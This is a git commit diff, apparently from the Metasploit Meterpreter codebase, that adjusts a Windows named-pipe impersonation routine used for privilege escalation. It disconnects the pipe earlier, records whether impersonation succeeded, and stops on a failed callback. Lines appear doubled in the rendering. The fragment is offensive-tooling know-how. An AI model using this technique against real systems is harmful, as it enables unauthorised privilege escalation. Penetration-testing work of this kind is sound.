
Land , Disconnect the named pipe and break after the impersonation callback

Merge branch 'land-438' into upstream-master
bwatters-r7 2020-10-07 14:51:36 -05:00
commit b1c8376459
GPG Key ID: ECC0F0A52E65F268

@ -35,6 +35,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
char * cpPipeName = NULL; char * cpPipeName = NULL;
BYTE bMessage[128] = {0}; BYTE bMessage[128] = {0};
DWORD dwBytes = 0; DWORD dwBytes = 0;
BOOL bImpersonated = FALSE;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL; PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do { do {
@ -85,11 +86,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
// we can't impersonate a client until we have performed a read on the pipe... // we can't impersonate a client until we have performed a read on the pipe...
if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) { if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) {
DisconnectNamedPipe(hPipe);
CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed"); CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed");
} }
// impersonate the client! // impersonate the client!
if (!ImpersonateNamedPipeClient(hPipe)) { bImpersonated = ImpersonateNamedPipeClient(hPipe);
DisconnectNamedPipe(hPipe);
if (!bImpersonated) {
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed"); CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
} }
@ -98,7 +102,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam); dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) { if (dwResult != ERROR_SUCCESS) {
RevertToSelf(); RevertToSelf();
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed"); BREAK_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
} }
} }
else { else {
@ -109,7 +113,6 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
} while (0); } while (0);
if (hPipe) { if (hPipe) {
DisconnectNamedPipe(hPipe);
CLOSE_HANDLE(hPipe); CLOSE_HANDLE(hPipe);
} }